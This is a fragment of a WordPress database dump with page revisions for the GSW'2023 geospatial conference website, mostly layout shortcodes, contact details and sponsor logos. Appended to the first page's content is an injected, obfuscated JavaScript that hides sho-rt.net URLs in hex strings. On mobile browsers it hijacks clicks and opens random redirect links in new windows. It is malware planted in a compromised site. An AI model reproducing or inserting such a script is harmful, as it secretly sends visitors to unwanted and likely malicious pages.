link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:25:35','2023-08-15 23:25:35','',3066,'https://gsw2023.com/?p=5220',0,'revision','',0),
(5221,1,'2023-08-15 23:26:41','2023-08-15 23:26:41','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner]\r\n\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" 